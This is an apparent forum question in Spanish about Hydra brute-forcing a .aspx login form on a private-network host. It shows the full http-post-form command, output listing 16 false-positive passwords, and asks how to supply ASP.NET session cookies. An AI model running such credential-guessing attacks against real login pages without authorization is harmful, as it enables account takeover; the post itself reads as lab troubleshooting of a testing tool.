He estado jugando con el sitio de Hydra y .aspx y he tenido algunos inconvenientes: Hydra responde y me dice que las primeras 16 contraseñas de mi lista de contraseñas son correctas cuando ninguna de ellas lo es. p>
Sintaxis:
hydra 192.168.88.196 -l admin -P /root/lower http-post-form "/mmm/index.aspx:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect."
Salida
Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2015-05-05 22:30:51
[DATA] 16 tasks, 1 server, 815 login tries (l:1/p:815), ~50 tries per task
[DATA] attacking service http-get-form on port 80
[80][www-form] host: 192.168.88.196 login: admin password: adrianna
[STATUS] attack finished for 192.168.88.196 (waiting for children to finish)
[80][www-form] host: 192.168.88.196 login: admin password: adrian
[80][www-form] host: 192.168.88.196 login: admin password: aerobics
[80][www-form] host: 192.168.88.196 login: admin password: academic
[80][www-form] host: 192.168.88.196 login: admin password: access
[80][www-form] host: 192.168.88.196 login: admin password: abc
[80][www-form] host: 192.168.88.196 login: admin password: admin
[80][www-form] host: 192.168.88.196 login: admin password: academia
[80][www-form] host: 192.168.88.196 login: admin password: albatross
[80][www-form] host: 192.168.88.196 login: admin password: alex
[80][www-form] host: 192.168.88.196 login: admin password: airplane
[80][www-form] host: 192.168.88.196 login: admin password: albany
[80][www-form] host: 192.168.88.196 login: admin password: ada
[80][www-form] host: 192.168.88.196 login: admin password: aaa
[80][www-form] host: 192.168.88.196 login: admin password: albert
[80][www-form] host: 192.168.88.196 login: admin password: alexander
1 of 1 target successfuly completed, 16 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-05-05 22:30:51
He leído que podemos agregar cookies a Hydra ok: "H=Cookie: security;low;PHPSESSID=<value for PHP SESSID cookie"
- ¿Cómo obtiene las cookies de aspx?
- ¿Cómo se lo proporcionas a la hidra?